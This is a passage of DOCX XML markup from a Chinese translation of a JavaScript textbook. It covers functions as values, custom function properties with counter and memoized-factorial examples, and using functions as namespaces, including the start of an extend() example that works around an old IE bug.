      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>subtract(x,y){return x-y;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function multiply(x,y){return x*y;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function divide(x,y){return x/y;}//</w:t>
      </w:r>
      <w:r>
        <w:t>这里的函数以上面的某个函数作为参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并给它传入两个操作数然后调用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function operate(operator,operand1,operand2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return operator(operand1,operand2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这行代码所示的函数调用实际上计算了</w:t>
      </w:r>
      <w:r>
        <w:t>(2+3)+(4*5)</w:t>
      </w:r>
      <w:r>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i</w:t>
      </w:r>
      <w:r>
        <w:t>=operate(add,operate(add,2,3),operate(multiply,4,5));//</w:t>
      </w:r>
      <w:r>
        <w:t>我们为这个例子重复实现一个简单的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这次实现使用函数直接量，这些函数直接量定义在一个对象直接量中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var operators={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>add:function(x,y){return x+y;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>subtract:function(x,y){return x-y;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>multiply:function(x,y){return x*y;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>divide:function(x,y){return</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> x/y;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>pow:Math.pow//</w:t>
      </w:r>
      <w:r>
        <w:t>使用预定义的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数接收一个名字作为运算符，在对象中查找这个运算符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后将它作用于所提供的操作数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意这里调用运算符函数的语法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function operate2(operation,operand1,operand2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof operators[operation]==="function")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return operators[operation](operand1,operand2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else throw"unknown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operator";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这样来计算</w:t>
      </w:r>
      <w:r>
        <w:t>("hello"+""+"world")</w:t>
      </w:r>
      <w:r>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var j=operate2("add","hello",operate2("add","","world"));//</w:t>
      </w:r>
      <w:r>
        <w:t>使用预定义的函数</w:t>
      </w:r>
      <w:r>
        <w:t>Math.pow()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var k=operate2("pow",10,2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里是将函数用做值的另外一个例子，考虑一下</w:t>
      </w:r>
      <w:r>
        <w:t>Array.sort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。这个方法用来对数组元素进行排序。因为排序的规则有很多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>（基于数值大小、字母表顺序、日期大小、从小到大、从大到小等），</w:t>
      </w:r>
      <w:r>
        <w:t>sort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以接收一个函数作为参数，用来处理具体的排序操作。这个函数的作用非常简单，对于任意两个值都返回一个值，以指定它们在排序后的数组中的先后顺序。这个函数参数使得</w:t>
      </w:r>
      <w:r>
        <w:t>Array.sort()</w:t>
      </w:r>
      <w:r>
        <w:t>具有更完美的通用性和无限可扩展性，它可以对任何类型的数据进行任意排序。</w:t>
      </w:r>
      <w:r>
        <w:t>7.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节有示例代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="205" w:name="Zi_Ding_Yi_Han_Shu_Shu_Xing_"/>
      <w:r>
        <w:t>自定义函数属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数并不是原始值，而是一种特殊的对象，也就是说，函数可以拥有属性。当函数需要一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>静态</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>变量来在调</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用时保持某个值不变，</w:t>
      </w:r>
      <w:r>
        <w:t>最方便的方式就是给函数定义属性，而不是定义全局变量，显然定义全局变量会让命名空间变得更加杂乱无章。比如，假设你想写一个返回一个唯一整数的函数，不管在哪里调用函数都会返回这个整数。而函数不能两次返回同一个值，为了做到这一点，函数必须能够跟踪它每次返回的值，而且这些值的信息需要在不同的函数调过程中持久化。可以将这些信息存放到全局变量中，但这并不是必需的，因为这个信息仅仅是函数本身用到的。最好将这个信息保存到函数对象的一个属性中，下面这个例子就实现了这样一个函数，每次调用函数都会返回一个唯一的整数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>初始化</w:t>
      </w:r>
      <w:r>
        <w:t>函数对象的计数器属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>由于函数声明被提前了，因此这里是可以在函数声明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>之前给它的成员赋值的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>uniqueInteger.counter=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>每次调用这个函数都会返回一个不同的整数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它使用一个属性来记住下一次将要返回的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function uniqueInteger(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return uniqueInteger.counter++;//</w:t>
      </w:r>
      <w:r>
        <w:t>先返回计数器的值，然后计数器自增</w:t>
      </w:r>
      <w:r>
        <w:t>1</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来看另外一个例子，下面这个函数</w:t>
      </w:r>
      <w:r>
        <w:t>factorial()</w:t>
      </w:r>
      <w:r>
        <w:t>使用了自身的属性（将自身当做数组来对待）来缓存上一次的计算结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>计算阶乘，并将结果缓存至函数的属性中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function factorial(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isFinite(n)</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>n==Math.round(n)){//</w:t>
      </w:r>
      <w:r>
        <w:t>有限的正整数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(!(n in factorial))//</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有缓存结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>factorial[n]=n*factorial(n-1);//</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果并缓存之</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return factorial[n];//</w:t>
      </w:r>
      <w:r>
        <w:t>返回缓存结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else return NaN;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果输入有误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>factorial[1]=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>初始化缓存以保存这种基本情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="8_5_Zuo_Wei_Ming_Ming_Kong_Jian_De_Han_S"/>
      <w:r>
        <w:t>8.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为命名空间的函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.10.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数作用域的概念：在函数中声明的变量在整个函数体内都是可见的（包括在嵌套的函数中），在函数的外部是不可见的。不在任何函数内声明的变量是全局变量，在整个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中都是可见的。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中是无法声明只在一个代码块内可见的变量的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>，基于这个原因，我们常常简单地定义一个函数用做临时的命名空间，在这个命名空间内定义的变量都不会污染到全局命名空间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>比如，假设你写了一段</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>模块代码，这段代码将要用在不同的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中（对于客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来讲通常是用在各种各样的网页中）。和大多数代码一样，假定这段代码定义了一个用以存储中间计算结果的变量。这样问题就来了，当模块代码放到不同的程序中运行时，你无法得知这个变量是否已经创建了，如果已经存在这个变量，那么将会和代码发生冲突。解决办法当然</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>是将代码放入一个函数内，然后调用这个函数。这样全局变量就变成了函数内的局部变量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function mymodule(){//</w:t>
      </w:r>
      <w:r>
        <w:t>模块代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个模块所使用的所有变量都是局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>而不是污染全局命名空间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>mymodule();//</w:t>
      </w:r>
      <w:r>
        <w:t>不要忘了还要调用这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这段代码仅仅定义了一个单独的全局变量：名叫</w:t>
      </w:r>
      <w:r>
        <w:t>"mymodule"</w:t>
      </w:r>
      <w:r>
        <w:t>的函数。这样还是太麻烦，可以直接定义一个匿名函数，并在单个表达式中调用它：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(function(){//mymodule()</w:t>
      </w:r>
      <w:r>
        <w:t>函数重写为匿名的函数表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>模块代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}());//</w:t>
      </w:r>
      <w:r>
        <w:t>结束函数定义并立即调用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这种定义匿名函数并立即在单个表达式中调用它的写法非常常见，已经成为一种惯用法了。注意上面代码的圆括号的用法，</w:t>
      </w:r>
      <w:r>
        <w:t>fu</w:t>
      </w:r>
      <w:r>
        <w:t>nction</w:t>
      </w:r>
      <w:r>
        <w:t>之前的左圆括号是必需的，因为如果不写这个左圆括号，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器会试图将关键字</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>解析为函数声明语句。使用圆括号</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器才会正确地将其解析为函数定义表达式。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使用圆括号是习惯用法，尽管有些时候没有必要也不应当省略。这里定义的函数会立即调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>8-3</w:t>
      </w:r>
      <w:r>
        <w:t>展示了这种命名空间技术。它定义一个返回</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的匿名函数，正如在例</w:t>
      </w:r>
      <w:r>
        <w:t>6-2</w:t>
      </w:r>
      <w:r>
        <w:t>中所展示的那样，匿名函数中的代码检测了是否出现了一个众所周知的</w:t>
      </w:r>
      <w:r>
        <w:t>IE bug</w:t>
      </w:r>
      <w:r>
        <w:t>，如果出现了这个</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>，就返回一个带补丁的函数版本。</w:t>
      </w:r>
      <w:r>
        <w:t>此外，这个匿名函数命名空间用来隐藏一组属性名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>8-3</w:t>
      </w:r>
      <w:r>
        <w:t>：特定场景下返回带补丁的</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个扩展函数，用来将第二个以及后续参数复制至第一个参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里我们处理了</w:t>
      </w:r>
      <w:r>
        <w:t>IE bug</w:t>
      </w:r>
      <w:r>
        <w:t>：在多数</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>版本中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性拥有一个不可枚举的同名属性，则</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>不会枚举对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的可枚举属性，也就是说，将不会正确地处理诸如</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>除非我们显式检测它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var extend=(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>将这个函数的返回值赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>extend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在修复它之前，首先检查是否存</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var p in{toString:null}){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果代码执行到这里，那么</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环会正确工作并返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个简单版本的</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return function extend(o){</w:t>
